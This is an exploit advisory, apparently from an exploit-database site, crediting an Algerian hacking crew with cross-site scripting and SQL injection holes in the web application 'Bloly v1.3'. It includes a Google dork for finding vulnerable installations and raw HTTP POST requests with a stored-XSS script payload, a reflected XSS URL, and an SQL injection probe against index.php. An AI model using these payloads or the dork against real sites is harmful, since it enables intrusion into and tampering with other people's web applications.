#### # Exploit Title: Bloly v1.3 (/SQL/Xss) Mutiple Vulnerabilities
# Author: T0x!c
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category:: webapps
# Google Dork:[intext:"Bloly v1.3 by SoftCab Inc" ]
# Software : http://www.lbb.org/script/telecharger.php?ID=6859
# Version: 1.3
# Tested on: || Windows || 
####

##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * soucha |
# | ***** KinG Of PiraTeS * The g0bl!n * dr.R!dE  ***** |
# | ------------------------------------------------- < |
##

All vulnerabilities effects /Path/index.php. 

####[ p0c 1 | Cross Site Scripting Vulnerabilities : ]===>
POST /index.php?action=3 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: STORED XSS TEST
Host: localhost
Content-Length: 68
Connection: Close
Pragma: no-cache

# [Post Data:]==>
email=>"><ScRiPt%20%0a%0d>alert(421135893768)%3B</ScRiPt>&register=1


####[ Cross Site Scripting in URI : ]===>
+>Exploit:
http://localhost/Path/index.php/>"><ScRiPt>alert(490545961838)</ScRiPt>

####[ p0c 2 Sql Injection : ]===>
POST /index.php?action=11 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Sql Injection
Host: localhost
Content-Length: 68
Connection: Close
Pragma: no-cache

# [Post Data:]==>
q=%00'

=================================**AlgeriansHackers**================================== 
# Greets To : KedAns-Dz * Caddy-Dz * Kha&miX * Jago-dz * Amine Msd * Kalashinkov * 
 Indoushka * (exploit-id.com) , (1337day.com) , (dis9.com) , (Dz-Team.biz) 
=======================================================================================